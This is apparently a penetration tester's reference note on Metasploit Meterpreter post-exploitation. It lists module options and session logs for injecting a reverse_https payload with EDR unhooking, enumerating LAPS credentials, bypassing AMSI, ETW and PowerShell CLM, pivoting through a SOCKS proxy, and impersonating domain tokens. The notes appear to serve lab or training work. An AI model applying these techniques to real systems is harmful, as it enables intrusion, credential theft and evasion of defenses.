Backlink: reference-notes-readme
Meterpreter Tips and Tricks
Post Modules in Open Session
Use the following modules from the meterpreter prompt with: run [module] [opts]
Module: post/windows/manage/run_as
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes Command to execute
CMDOUT false yes Retrieve command output
DOMAIN yes Domain to login with
PASSWORD yes Password to login with
SESSION yes The session to run this module on
USER yes Username to login with
Module: /post/windows/manage/run_as_psh
Name Current Setting Required Description
---- --------------- -------- -----------
ARGS no Arguments
CHANNELIZE true yes Chanelize output, required for reading output or interracting
DOMAIN no Domain of user
EXE cmd.exe yes Executable to run
HIDDEN true yes Hide the window
INTERACTIVE true yes Run interactively
PASS yes Password of user
PATH C:\ yes Working Directory
SESSION yes The session to run this module on
USER yes User to run executable as
Module: post/windows/manage/archmigrate
Default options should execute without issue.
aaa
Module: windows/local/payload_inject
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOUNHOOK false no Auto remove EDRs hooks
PID 0 no Process Identifier to inject of process to inject payload. 0=New Process
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
SESSION yes The session to run this module on
WAIT_UNHOOK 5 yes Seconds to wait for unhook to be executed
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 0.0.0.0 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Windows
Module: post/windows/gather/credentials/enum_laps
Module: powershell
load powershell
Use the above command to load the powershell extension.
powershell_shell
Use the above command to open a new powershell shell, which will have bypassed CLM restrictions.
Module: multi/manage/autoroute
c:\Users\will>^Z
Background channel 1? [y/N] y
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use multi/manage/autoroute
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 post(multi/manage/autoroute) > set session 2
session => 2
msf6 post(multi/manage/autoroute) > exploit
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against CLIENT09
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.76.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
Reference the commands above to set up a SOCKS proxy through a meterpreter session.
Module: incognito
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > use incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SQL05\setup
TRICKY\sqlsvc
Window Manager\DWM-1
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token TRICKY\\sqlsvc
[+] Delegation token available
[+] Successfully impersonated user TRICKY\sqlsvc
meterpreter > getuid
Server username: TRICKY\sqlsvc
Module: post/windows/manage/execute_dotnet_assembly
Module options (post/windows/manage/execute_dotnet_assembly):
Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ARGUMENTS no Command line arguments
DOTNET_EXE yes Assembly file name
ETWBYPASS true yes Enable Etw bypass
PID 0 no Pid to inject
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
PROCESS notepad.exe no Process to spawn
SESSION yes The session to run this module on
Signature Automatic yes The Main function signature (Accepted: Automatic, Main(), Main(string[]))
USETHREADTOKEN true no Spawn process with thread impersonation
WAIT 10 no Time in seconds to wait
Thats it.